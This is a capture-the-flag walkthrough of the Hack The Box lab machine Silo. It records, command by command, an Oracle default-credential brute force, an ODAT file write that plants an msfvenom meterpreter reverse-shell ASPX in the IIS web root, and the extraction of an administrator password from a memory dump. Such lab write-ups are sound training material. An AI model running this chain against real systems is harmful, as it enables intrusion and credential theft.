Hack The Box - Silo
Introduction
Silo is a medium box rated 4.6. It’s very hard to get initial access but the privilege escalation is easy.
Let’s just start enumerating the machine.
Enumeration
Nmap Scans
The first thing I do is a fast scan of all TCP ports:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sudo nmap -sS -v -p- 10.10.10.82
Initiating Ping Scan at 07:59
Scanning 10.10.10.82 [4 ports]
Completed Ping Scan at 07:59, 0.22s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:59
Scanning silo.htb (10.10.10.82) [65535 ports]
Completed SYN Stealth Scan at 08:10, 683.62s elapsed (65535 total ports)
Nmap scan report for silo.htb (10.10.10.82)
Host is up (0.12s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 684.01 seconds
Raw packets sent: 71689 (3.154MB) | Rcvd: 184034 (23.407MB)
On those open ports, I perform a deep scan:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sudo nmap -A 10.10.10.82 -p 80,135,139,445,1521,5985,47001,49000-50000
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 08:11 CEST
Nmap scan report for silo.htb (10.10.10.82)
Host is up (0.12s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 8m00s, deviation: 0s, median: 8m00s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-30T06:22:08
|_ start_date: 2021-08-30T06:05:51
TRACEROUTE (using port 49890/tcp)
HOP RTT ADDRESS
1 230.71 ms 10.10.16.1
2 230.93 ms silo.htb (10.10.10.82)
Nmap done: 1 IP address (1 host up) scanned in 153.46 seconds
I also tried running a script scan, but that wasn’nt very helpful:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sudo nmap 10.10.10.82 -script vuln
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 08:25 CEST
Nmap scan report for silo.htb (10.10.10.82)
---snip---
Host script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to try
Nmap done: 1 IP address (1 host up) scanned in 424.87 seconds
Enumeration Of The Services
The Nmap scan could not really determine the OS, but I’m sure that this is a windows machine. In this section, I enumerate all the services that run on the open ports (except the windows RPCs)
Port 139 & 445
On this port runs SMB. The first thing I try is to list the shares available without a password:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ smbclient -L //silo.htb/
Enter WORKGROUP\user's password:
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ smbmap -H silo.htb
[!] Authentication error on silo.htb
I tried it both with smbclient and smbmap, but none of them worked. I need to find some credentials first.
Port 80, 5985 & 47001
It seems that only on port 80 runs a website, the other ones can’t be reached. On the other ports I get a 404 error. So I run some gobuster scans for the ports and scan for hidden directories and virtual hosts:
Port 80 directory scan:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster dir -u http://silo.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,log,txt
[+] Timeout: 10s
===============================================================
2021/08/30 07:59:36 Starting gobuster in directory enumeration mode
===============================================================
/*checkout* (Status: 400) [Size: 3420]
/*docroot* (Status: 400) [Size: 3420]
/* (Status: 400) [Size: 3420]
Progress: 100375 / 1102805 (9.10%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/08/30 08:21:24 Finished
===============================================================
No directories found (I aborted the scan at 10%, it took too long and there will be (99% sure) no more results if I would run the scan any longer. So I tried a vhost scan:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster vhost -u http://silo.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o gobuster-host.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/30 08:28:37 Starting gobuster in VHOST enumeration mode
===============================================================
===============================================================
2021/08/30 08:51:04 Finished
===============================================================
But also no results. I tried the other ports (5985):
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster dir -u http://silo.htb:5985 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-5985.txt -x php,html,log,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb:5985
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,log,txt,php
[+] Timeout: 10s
===============================================================
2021/08/30 08:21:38 Starting gobuster in directory enumeration mode
===============================================================
Progress: 40200 / 1102805 (3.65%)[ERROR] 2021/08/30 08:36:34 [!] Get "http://silo.htb:5985/top_nav.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/08/30 08:36:34 [!] Get "http://silo.htb:5985/robotics.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 44435 / 1102805 (4.03%)[ERROR] 2021/08/30 08:38:16 [!] Get "http://silo.htb:5985/Utility": read tcp 10.10.17.28:57022->10.10.10.82:5985: read: connection reset by peer
Progress: 44455 / 1102805 (4.03%)[ERROR] 2021/08/30 08:38:19 [!] Get "http://silo.htb:5985/gifshuffle.log": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/08/30 08:38:19 [!] Get "http://silo.htb:5985/forgotpass.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/08/30 08:38:19 [!] Get "http://silo.htb:5985/1824.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 72485 / 1102805 (6.57%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/08/30 08:48:23 Finished
===============================================================
Virtual host scan of port 5985:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster vhost -u http://silo.htb:5985 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o gobuster-host-5985.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb:5985
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/30 08:49:15 Starting gobuster in VHOST enumeration mode
===============================================================
===============================================================
2021/08/30 09:13:34 Finished
===============================================================
No results, continue with next port (47001):
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster dir -u http://silo.htb:47001 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-47001.txt -x php,html,log,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb:47001
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,log,txt
[+] Timeout: 10s
===============================================================
2021/08/30 08:22:04 Starting gobuster in directory enumeration mode
===============================================================
Progress: 39475 / 1102805 (3.58%)[ERROR] 2021/08/30 08:36:34 [!] Get "http://silo.htb:47001/061.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 43765 / 1102805 (3.97%)[ERROR] 2021/08/30 08:38:19 [!] Get "http://silo.htb:47001/puce.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2021/08/30 08:38:19 [!] Get "http://silo.htb:47001/dream": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 94665 / 1102805 (8.58%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/08/30 09:02:39 Finished
===============================================================
Virtual host scan of port 47001:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ gobuster vhost -u http://silo.htb:47001 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o gobuster-host-47001.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://silo.htb:47001
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/30 09:03:58 Starting gobuster in VHOST enumeration mode
===============================================================
===============================================================
2021/08/30 09:25:14 Finished
===============================================================
Here the same, no directories or vhosts found. So I tried another tools called dirsearch:
Here is the output for all of the three ports:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ python3 /tools/dirsearch/dirsearch.py -u http://silo.htb/ -e php -x 403,404 -t 50
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8929
Output File: /tools/dirsearch/reports/silo.htb/-_21-08-30_08-48-07.txt
Error Log: /tools/dirsearch/logs/errors-21-08-30_08-48-07.log
Target: http://silo.htb/
[08:48:07] Starting:
[08:48:23] 301 - 153B - /aspnet_client -> http://silo.htb/aspnet_client/
[08:48:34] 400 - 3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[08:48:34] 400 - 3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[08:48:34] 400 - 3KB - /jolokia/exec/java.lang:type=Memory/gc
[08:48:34] 400 - 3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[08:48:34] 400 - 3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[08:48:34] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
Task Completed
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ python3 /tools/dirsearch/dirsearch.py -u http://silo.htb:5985/ -e php -x 403,404 -t 50
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8929
Output File: /tools/dirsearch/reports/silo.htb-5985/-_21-08-30_09-05-30.txt
Error Log: /tools/dirsearch/logs/errors-21-08-30_09-05-30.log
Target: http://silo.htb:5985/
[09:05:30] Starting:
[09:06:17] 405 - 0B - /wsman
Task Completed
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ python3 /tools/dirsearch/dirsearch.py -u http://silo.htb:47001/ -e php -x 403,404 -t 50
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8929
Output File: /tools/dirsearch/reports/silo.htb-47001/-_21-08-30_09-07-18.txt
Error Log: /tools/dirsearch/logs/errors-21-08-30_09-07-18.log
Target: http://silo.htb:47001/
[09:07:18] Starting:
Task Completed
There are two interesting things from these scans:
http://10.10.10.82/aspnet_client/
http://10.10.10.82:5985/wsman
The first URL gives me a permission denied, the last one just an empty page. I think that the webserver will not bring me any further.
Port 1521 & 49159
On these ports runs the Oracle TNS listener. One port gives me the version: 11.2.0.2.0. I search for an exploit. I found the ODAT tool (Oracle database Attacking Tool):
GitHub - quentinhardy/odat: ODAT: Oracle Database Attacking Tool
Since 2016, there is a module called tnspoison, which can exploit CVE-2012-1675. You can also download the tool with this command: sudo apt install odat.
Exploitation
I try the exploit found above. I run it:
┌──(user㉿KaliVM)-[/tools/odat]
└─$ python3 odat.py tnspoison -s silo.htb
11:27:38 CRITICAL -: The server SID or Service Name must be given with
the '-d SID' or '-n serviceName' option.
The SID can be found with this command:
┌──(user㉿KaliVM)-[/tools/odat]
└─$ odat sidguesser -s silo.htb
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ################################### | ETA: 00:00:02
[+] 'XEXDB' is a valid SID. Continue...
100% |###################################################################################| Time: 00:05:12
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###################################################################################| Time: 00:00:10
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
There are two valid SIDs, XE and XEXDB. The port which is used by the service is the default port, so I do not need to specify the port:
┌──(user㉿KaliVM)-[/tools/odat]
└─$ python3 odat.py tnspoison -s silo.htb -d XE
11:31:48 CRITICAL -: An operation on this module must be chosen thanks to one of
these options: --test-module, --poison;
To test the module, I use the –test-module flag:
┌──(user㉿KaliVM)-[/tools/odat]
└─$ python3 odat.py tnspoison -s silo.htb -d XE --test-module
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
This means that the target is vulnerable, I try to exploit it (--poison flag):
┌──(user㉿KaliVM)-[/tools/odat]
└─$ python3 odat.py tnspoison -s silo.htb -d XE --poison
[1] (10.10.10.82:1521): Local proxy on port 1522 and TNS poisoning attack to 10.10.10.82:1521 are starting. Waiting for connections...
I waited a few minutes, but nothing happened. I found a metasploit module that can brute force the login credentials. I know I know, metasploit and OSCP, but I think there is no other way around this (for my skill level). So I use the module:
msf6 > use admin/oracle/oracle_login
msf6 auxiliary(admin/oracle/oracle_login) > options
Module options (auxiliary/admin/oracle/oracle_login):
Name Current Setting Required Description
---- --------------- -------- -----------
CSVFILE /usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv no The file that contains a list of default accounts.
RHOST yes The Oracle host.
RPORT 1521 yes The TNS port.
SID ORCL yes The sid to authenticate with.
msf6 auxiliary(admin/oracle/oracle_login) > set rhost silo.htb
rhost => silo.htb
msf6 auxiliary(admin/oracle/oracle_login) > set SID XE
SID => XE
Now, I just need to execute the module:
msf6 auxiliary(admin/oracle/oracle_login) > run
[*] Starting brute force on 10.10.10.82:1521...
[+] Found user/pass of: scott/tiger on 10.10.10.82 with sid XE
[*] Auxiliary module execution completed
There are the credentials. I noticed that these are one of the default credentials for the service.
To connect to the database, I use a tool made by oracle for this purpose. It’s called sqlplus:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sudo apt install oracle-instantclient-sqlplus
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sqlplus scott/tiger@silo.htb:1521/XE
SQL*Plus: Release 19.0.0.0.0 - Production on Mon Aug 30 12:41:11 2021
Version 19.6.0.0.0
Copyright (c) 1982, 2019, Oracle. All rights reserved.
ERROR:
ORA-28002: the password will expire within 7 days
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL>
The connection works, I just check the privileges that I have:
SQL> SELECT * FROM user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
Now, I return to ODAT and try all modules on the target:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ sudo odat all -s silo.htb -d XE -U scott -P tiger
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
[2] (10.10.10.82:1521): Testing all modules on the XE SID with the scott/tiger account
[2.1] UTL_HTTP library ?
[-] KO
[2.2] HTTPURITYPE library ?
12:45:49 WARNING -: Impossible to fetch all the rows of the query select
httpuritype('http://0.0.0.0/').getclob() from dual: `ORA-29273: HTTP
request failed ORA-06512: at "SYS.UTL_HTTP", line 1819 ORA-24247: network access
denied by access control list (ACL) ORA-06512: at "SYS.HTTPURITYPE", line 34`
[-] KO
[2.3] UTL_FILE library ?
[-] KO
[2.4] JAVA library ?
[-] KO
[2.5] DBMSADVISOR library ?
[+] OK
[2.6] DBMSSCHEDULER library ?
[-] KO
[2.7] CTXSYS library ?
[-] KO
[2.8] Hashed Oracle passwords ?
[-] KO
---snip---
DBMS_XSLPROCESSOR library is enabled and will allows me to put files onto the machine. I just try a simple file to check if I could uplaod a reverse shell:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ cat hello.txt
Hello World
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ odat utlfile --putFile C:\\inetpub\\wwwroot\\ hello.txt /hackthebox/oscp-prep/silo/hello.txt -s silo.htb -p 1521 -U scott -P tiger -d XE --sysdba
[1] (10.10.10.82:1521): Put the /hackthebox/oscp-prep/silo/hello.txt local file in the C:\inetpub\wwwroot\ folder like hello.txt on the 10.10.10.82 server
[+] The /hackthebox/oscp-prep/silo/hello.txt file was created on the C:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the hello.txt file
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ curl silo.htb/hello.txt
Hello World
This worked, so I will generate a reverse shell. I already used metasploit for this box, so it does not matter if I use a meterpreter shell:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.17.28 LPORT=1337 -f aspx-exe -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx-exe file: 24259 bytes
Saved as: shell.aspx
I upload the shell the same way as the test file before:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ odat utlfile --putFile C:\\inetpub\\wwwroot\\ shell.aspx /hackthebox/oscp-prep/silo/shell.aspx -s silo.htb -p 1521 -U scott -P tiger -d XE --sysdba
[1] (10.10.10.82:1521): Put the /hackthebox/oscp-prep/silo/shell.aspx local file in the C:\inetpub\wwwroot\ folder like shell.aspx on the 10.10.10.82 server
[+] The /hackthebox/oscp-prep/silo/shell.aspx file was created on the C:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the shell.aspx file
Before curling the shell, I open a metasploit multi/handler:
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.10.17.28
msf6 exploit(multi/handler) > set lport 1337
lport => 1337
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started reverse TCP handler on 10.10.17.28:1337
msf6 exploit(multi/handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://10.10.17.28:1337
To call the reverse shell I use curl:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ curl http://silo.htb/shell.aspx
And I got the meterpreter shell:
[*] Started reverse TCP handler on 10.10.17.28:1337
[*] Sending stage (175174 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.17.28:1337 -> 10.10.10.82:49167)
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows IIS APPPOOL\DefaultAppPool @ SIL 10.10.17.28:1337
O 9167 10.10.10.82
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
A shell spawned as the IIS user.
User Flag
I can now get the user flag:
meterpreter > dir
Listing: c:\Users\Phineas\Desktop
=================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 300 fil 2018-01-05 23:53:19 +0100 Oracle issue.txt
100666/rw-rw-rw- 282 fil 2018-01-04 22:40:41 +0100 desktop.ini
100444/r--r--r-- 34 fil 2018-01-04 22:41:14 +0100 user.txt
meterpreter > cat user.txt
1f**************************8021
I was able to get obtain the user flag.
Privilege Escalation
In the same directory is a file Oracle issue.txt:
C:\Users\Phineas\Desktop>type "Oracle issue.txt"
type "Oracle issue.txt"
Support vendor engaged to troubleshoot Windows/Oracle performance issue (full mem dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
£%Hm8646uC$
This is a full memory dump, which may contain a password. I download and extract the dump file. To analyze it, I use volatility:
So I use volatility3 to “decode” the memory dump file:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ python3 /tools/volatility3/vol.py -f SILO-20180105-221806.dmp lsadump
---snip---
Key Secret Hex
DefaultPassword DoNotH@ckMeBro! 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 6f 00 4e 00 6f 00 74 00 48 00 40 00 63 00 6b 00 4d 00 65 00 42 00 72 00 6f 00 21 00 00 00
DPAPI_SYSTEM ,Ï%14®C-¬ò§tmC¨¦©Bb÷UpH»}þyI½ 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 cf 25 94 31 34 9e ae 43 2d 8b 87 ac f2 a7 74 1c 6d ec 1c 04 08 43 a8 a6 a9 42 62 f7 55 70 48 bb 17 7d 82 fe 79 49 02 bd 00 00 00 00
So the password is DoNotH@ackMeBro!.
With the tool winexe, I can spawn a shell as administrator:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/silo]
└─$ winexe -U Administrator //silo.htb cmd.exe
Enter password: DoNotH@ackMeBro!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
silo\administrator
C:\Windows\system32>
And a shell as administrator spawns. The password was correct.
Root Flag
It’s time to gather the root flag:
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 69B2-6341
Directory of C:\Users\Administrator\Desktop
01/07/2018 02:34 PM <DIR> .
01/07/2018 02:34 PM <DIR> ..
08/30/2021 07:06 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,339,597,824 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
cb**************************4f73
Conclusions
This was a fun box and I learned a lot. Especially to exploit odat. The box help me a lot to pass the OSCP exam.